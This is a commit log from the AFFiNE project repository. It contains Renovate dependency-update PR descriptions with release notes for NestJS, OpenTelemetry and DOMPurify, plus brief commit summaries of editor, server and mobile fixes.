- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzEuOSIsInVwZGF0ZWRJblZlciI6IjQzLjI3Mi40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 10:58:02 +08:00
renovate[bot] d3975a64f4 chore: bump up nestjs (#15276)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.27` →
`11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.27/11.1.28)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.28?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.27/11.1.28?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.27` →
`11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.27/11.1.28)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.28?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.27/11.1.28?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.27` →
`11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.27/11.1.28)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.28?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.27/11.1.28?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.27` →
`11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.27/11.1.28)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.28?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.27/11.1.28?slim=true)
|
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) |
[`11.4.4` →
`11.4.6`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.4/11.4.6)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.6?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.4.4/11.4.6?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.27` →
`11.1.28`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.27/11.1.28)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.28?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.27/11.1.28?slim=true)
|

---

### Release Notes

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.28`](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/core)</summary>

###
[`v11.1.28`](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-express)</summary>

###
[`v11.1.28`](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28)

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/platform-socket.io)</summary>

###
[`v11.1.28`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.28)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.27...v11.1.28)

##### v11.1.28 (2026-07-08)

##### Bug fixes

- `core`
- [#&#8203;17239](https://redirect.github.com/nestjs/nest/pull/17239)
fix(core): trigger teardown of SSE producer Observable on client
disconnect with interceptor
([@&#8203;jyx-07](https://redirect.github.com/jyx-07))
- `common`
- [#&#8203;17257](https://redirect.github.com/nestjs/nest/pull/17257)
fix(common): Add missing exception classes to HttpErrorByCode
([@&#8203;Se3do](https://redirect.github.com/Se3do))
- `websockets`
- [#&#8203;17188](https://redirect.github.com/nestjs/nest/pull/17188)
fix(websockets): correct type guard to check value not key
([@&#8203;Se3do](https://redirect.github.com/Se3do))

##### Enhancements

- `core`
- [#&#8203;17241](https://redirect.github.com/nestjs/nest/pull/17241)
feat(core): include auto-converted route in legacy route path warning
([@&#8203;ronielli](https://redirect.github.com/ronielli))

##### Dependencies

- `platform-fastify`
- [#&#8203;17262](https://redirect.github.com/nestjs/nest/pull/17262)
chore(deps): bump fastify from 5.8.5 to 5.10.0
([@&#8203;dependabot\[bot\]](https://redirect.github.com/apps/dependabot))
- `platform-express`
- [#&#8203;17164](https://redirect.github.com/nestjs/nest/pull/17164)
fix(deps): update dependency multer to v2.2.0 \[security]
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 4

- Mohammed Said ([@&#8203;Se3do](https://redirect.github.com/Se3do))
- Ronielli ([@&#8203;ronielli](https://redirect.github.com/ronielli))
- greymoth
([@&#8203;greymoth-jp](https://redirect.github.com/greymoth-jp))
- 종윤 ([@&#8203;jyx-07](https://redirect.github.com/jyx-07))

</details>

<details>
<summary>nestjs/swagger (@&#8203;nestjs/swagger)</summary>

###
[`v11.4.6`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.6)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.5...11.4.6)

#### 11.4.6 (2026-07-17)

##### Features

- [#&#8203;3964](https://redirect.github.com/nestjs/swagger/pull/3964)
feat(plugin): infer ApiParam enum from
[@&#8203;Param](https://redirect.github.com/Param) literal-union types
([@&#8203;y-hsgw](https://redirect.github.com/y-hsgw))

##### Bug fixes

- [#&#8203;3947](https://redirect.github.com/nestjs/swagger/pull/3947)
fix(type-helpers): preserve array-ness for nested DTO arrays in
DeepPartialType
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3945](https://redirect.github.com/nestjs/swagger/pull/3945)
fix(mimetype-content-wrapper): clone object per mimetype to avoid shared
references
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3972](https://redirect.github.com/nestjs/swagger/pull/3972)
fix: avoid inline PickType schema collisions
([@&#8203;cyphercodes](https://redirect.github.com/cyphercodes))
- [#&#8203;3969](https://redirect.github.com/nestjs/swagger/pull/3969)
fix: Added missing summary type to the response object
([@&#8203;MichielDeMey](https://redirect.github.com/MichielDeMey))

##### Enhancements

- [#&#8203;3949](https://redirect.github.com/nestjs/swagger/pull/3949)
feat(api-query): support custom OpenAPI extensions
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- [#&#8203;3986](https://redirect.github.com/nestjs/swagger/pull/3986)
fix(deps): update dependency js-yaml to v5
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 4

- Michiel De Mey
([@&#8203;MichielDeMey](https://redirect.github.com/MichielDeMey))
- Rayan Salhab
([@&#8203;cyphercodes](https://redirect.github.com/cyphercodes))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- Yukihiro Hasegawa
([@&#8203;y-hsgw](https://redirect.github.com/y-hsgw))

###
[`v11.4.5`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.5)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.4...11.4.5)

#### What's Changed

- feat(plugin): generate additionalProperties for Record/index-signature
types by [@&#8203;y-hsgw](https://redirect.github.com/y-hsgw) in
[#&#8203;3957](https://redirect.github.com/nestjs/swagger/pull/3957)
- fix(deps): update dependency swagger-ui-dist to v5.32.8 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;3973](https://redirect.github.com/nestjs/swagger/pull/3973)
- fix(deps): update dependency js-yaml to v4.2.0 \[security] by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;3988](https://redirect.github.com/nestjs/swagger/pull/3988)

**Full Changelog**:
<https://github.com/nestjs/swagger/compare/11.4.4...11.4.5>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNjUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjI2NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 10:57:37 +08:00
renovate[bot] b91db2ace4 chore: bump up opentelemetry (#15323)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql))
| [`^0.67.0` →
`^0.69.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.67.0/0.69.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.69.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.67.0/0.69.0?slim=true)
|
|
[@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis))
| [`^0.67.0` →
`^0.69.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.67.0/0.69.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.69.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.67.0/0.69.0?slim=true)
|
|
[@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core))
| [`^0.65.0` →
`^0.67.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.65.0/0.67.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.67.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.65.0/0.67.0?slim=true)
|
|
[@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io))
| [`^0.66.0` →
`^0.68.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.66.0/0.68.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.68.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.66.0/0.68.0?slim=true)
|
|
[@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`1.41.1` →
`1.43.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.41.1/1.43.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsemantic-conventions/1.43.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsemantic-conventions/1.41.1/1.43.0?slim=true)
|

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-graphql)</summary>

###
[`v0.69.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0690-2026-07-23)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/8d7daea5c404855f474a82f4296640af8b93b64c...27e172a9e0d549559056ccd58f27d13467454156)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3629](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3629))
([466d5de](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/466d5def474cf251217881322ed4db13fad96b86))

###
[`v0.68.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0680-2026-07-03)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/4e52a9053029304f271b7dbe1b07e7fb2b987e30...8d7daea5c404855f474a82f4296640af8b93b64c)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3593](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3593))
([6dfb532](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/6dfb532ac16889c2f8656f2d9132a290e68cb570))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-ioredis)</summary>

###
[`v0.69.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0690-2026-07-23)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/8d7daea5c404855f474a82f4296640af8b93b64c...27e172a9e0d549559056ccd58f27d13467454156)

##### ⚠ BREAKING CHANGES

- only emit stable http, network and database attributes
([#&#8203;3585](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3585))

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3629](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3629))
([466d5de](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/466d5def474cf251217881322ed4db13fad96b86))
- only emit stable http, network and database attributes
([#&#8203;3585](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3585))
([5b7dd0e](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/5b7dd0e102e940d653e04b08b5a1b721a8271037))

##### Bug Fixes

- **instrumentation-ioredis:** correctly mark MULTI/PIPELINE in
operation name
([#&#8203;3278](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3278))
([057847b](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/057847b3a8e849b72e0d0ca63bb3a17ffef9e413))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.67.0 to ^0.68.0

###
[`v0.68.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0680-2026-07-03)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/4e52a9053029304f271b7dbe1b07e7fb2b987e30...8d7daea5c404855f474a82f4296640af8b93b64c)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3593](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3593))
([6dfb532](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/6dfb532ac16889c2f8656f2d9132a290e68cb570))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.66.0 to ^0.67.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-nestjs-core)</summary>

###
[`v0.67.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0670-2026-07-23)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/8d7daea5c404855f474a82f4296640af8b93b64c...27e172a9e0d549559056ccd58f27d13467454156)

##### ⚠ BREAKING CHANGES

- only emit stable http, network and database attributes
([#&#8203;3585](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3585))

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3629](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3629))
([466d5de](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/466d5def474cf251217881322ed4db13fad96b86))
- only emit stable http, network and database attributes
([#&#8203;3585](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3585))
([5b7dd0e](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/5b7dd0e102e940d653e04b08b5a1b721a8271037))

###
[`v0.66.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0660-2026-07-03)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/4e52a9053029304f271b7dbe1b07e7fb2b987e30...8d7daea5c404855f474a82f4296640af8b93b64c)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3593](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3593))
([6dfb532](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/6dfb532ac16889c2f8656f2d9132a290e68cb570))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.68.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0680-2026-07-23)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/8d7daea5c404855f474a82f4296640af8b93b64c...27e172a9e0d549559056ccd58f27d13467454156)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3629](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3629))
([466d5de](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/466d5def474cf251217881322ed4db13fad96b86))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.67.0 to ^0.68.0

###
[`v0.67.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0670-2026-07-03)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/4e52a9053029304f271b7dbe1b07e7fb2b987e30...8d7daea5c404855f474a82f4296640af8b93b64c)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3593](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3593))
([6dfb532](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/6dfb532ac16889c2f8656f2d9132a290e68cb570))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.66.0 to ^0.67.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js
(@&#8203;opentelemetry/semantic-conventions)</summary>

###
[`v1.43.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/f7c090cf5ede9ce81bd8c96a092a0b549ad13c31...9b05f668ee7ab884a44b04b504e0baaff6c6d2b2)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/f7c090cf5ede9ce81bd8c96a092a0b549ad13c31...9b05f668ee7ab884a44b04b504e0baaff6c6d2b2)

###
[`v1.42.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/013c60085b84351a4c1e4e4f79e3dd67c56661cd...f7c090cf5ede9ce81bd8c96a092a0b549ad13c31)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/013c60085b84351a4c1e4e4f79e3dd67c56661cd...f7c090cf5ede9ce81bd8c96a092a0b549ad13c31)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzUuMiIsInVwZGF0ZWRJblZlciI6IjQzLjI4MC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-31 10:57:02 +08:00
DarkSky dd1c8dc7dd fix(editor): test stability (#15377)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Tests**
  * Improved automated validation for AI file embedding readiness.
* Expanded coverage for paragraph behavior when converting between list
types and deleting content.
* Strengthened checks for block structure and formatting outcomes to
help prevent regressions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-30 19:56:48 +08:00
DarkSky a1defa8a3b feat(server): update model list (#15375) 2026-07-30 13:58:07 +08:00
DarkSky 00576e1e78 feat(server): improve blob sync (#15367)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- **New Features**
- Standardized `usePresignedURL` configuration for AWS S3 and Cloudflare
R2 (including `enabled`, `urlPrefix`, and `signKey`).
- Storage upload URL generation now supports both direct provider
presigning and server-mediated proxying based on configuration.
- **Bug Fixes**
- Tightened upload and multipart validation (content type/length checks,
header vs query consistency, and stricter expiration handling).
- Improved fallback behavior when direct upload URL initialization
fails.
- **Tests**
- Updated R2 storage proxy end-to-end coverage to match the new
URL/token behavior.
- **Documentation**
  - Refreshed self-hosted JSON schema guidance for upload URL settings.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.27.4-beta.0 v2026.7.29-canary.953
2026-07-28 23:43:43 +08:00
DarkSky b6fc0a2192 fix(mobile): mobile keyboard padding (#15365)
#### PR Dependency Tree


* **PR #15365** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

- **Bug Fixes**
- Improved mobile keyboard and toolbar layout handling when the keyboard
overlays or resizes app content.
- Prevented incorrect extra spacing when Android applies keyboard insets
directly.
- Updated toolbar sizing and visibility states for smoother transitions.

- **Style**
- Adjusted mobile bottom spacing to account for keyboard height, safe
areas, and toolbar height.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v2026.7.28-canary.952
2026-07-28 13:02:38 +08:00
DarkSky e7ec8a1032 feat(editor): improve select perf (#15353)
maybe fix #12675


#### PR Dependency Tree


* **PR #15353** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

- **Bug Fixes**
- Improved block selection updates so selected states refresh reliably.
  - Corrected selected-block ordering and duplicate handling.
- Improved toolbar positioning accuracy and reduced unnecessary layout
recalculations.
  - Adjusted toolbar animation behavior for surface-based tools.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-28 11:38:00 +08:00
DarkSky cfc7bbb90f feat(server): improve doc gc (#15363)
#### PR Dependency Tree


* **PR #15363** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved validation of workspace roots and document projections, with
clearer failures for malformed or incomplete data.
  * Improved document reference rebuilding and cleanup reliability.
* Updated document update merging to better handle invalid binary data.

* **Performance**
* Avoided unnecessary document reconstruction when no updates are
pending.

* **Tests**
* Updated coverage for malformed workspace roots and document snapshot
parsing.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-28 11:20:12 +08:00
DarkSky b05f165820 fix(mobile): popover handle v2026.7.27-canary.1018 2026-07-26 20:57:00 +08:00
DarkSky 749f1c5f0b fix(mobile): popover styles (#15351) 2026-07-26 20:09:02 +08:00
DarkSky b975e6b562 chore: update config template (#15344) v2026.7.26-canary.940 2026-07-26 16:29:16 +08:00
DarkSky 0d889bc643 feat: improve mac dock behavior (#15334)
#### PR Dependency Tree


* **PR #15334** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Enhancements**
* Improved main-window restoration for deep links, second-instance
launches, tray/menu actions, and when recordings finish.
* Refined macOS Dock show/hide behavior with throttling for smoother
window visibility.
* Updated close-to-tray/close-to-background handling to better manage
the app’s window lifecycle.
* Ensured popup/dock visibility is consistent when opening new windows.
* Updated window behavior settings display so tray-related options
render correctly across platforms.
* **Localization**
* Updated Simplified Chinese wording for menubar window behavior title.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v2026.7.24-canary.947
2026-07-23 23:25:55 +08:00
DarkSky 8001451fd5 fix(core): onenote import (#15332)
#### PR Dependency Tree


* **PR #15332** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Added improved Windows support for importing OneNote files, including
`.one`, `.onetoc2`, and `.onepkg` formats.
* Enabled reliable handling of Windows paths, including UNC and verbatim
paths.
* Added filesystem operations for reading, writing, discovering, and
opening OneNote content on Windows.

* **Bug Fixes**
* Improved file access and path resolution during OneNote imports on
Windows.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-07-23 18:45:28 +08:00
DarkSky 174ad9bc55 feat(server): improve doc gc (#15329)
#### PR Dependency Tree


* **PR #15329** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Improvements**
* Enhanced reliability of document reconciliation/projection by
improving failure tracking and resumability after partial runs.
* Upgraded checkpoint persistence to include additional state (including
parser version and failure counts) so interrupted processing can resume
accurately.
* Improved recovery behavior so repeated rebuilds and parser-upgrade
scenarios correctly complete and reset failure indicators when
appropriate.
* **Tests**
* Added integration coverage for checkpoint failure/resume semantics,
including partial limits and upgrade-style recovery behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.27.3-beta.2 v2026.7.23-canary.948 v0.27.3
2026-07-23 16:21:32 +08:00
renovate[bot] 7c6a36728c chore: bump up dompurify version to v3.4.12 [SECURITY] (#15326)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.4.11`
→ `3.4.12`](https://renovatebot.com/diffs/npm/dompurify/3.4.11/3.4.12) |
![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.4.12?slim=true)
|
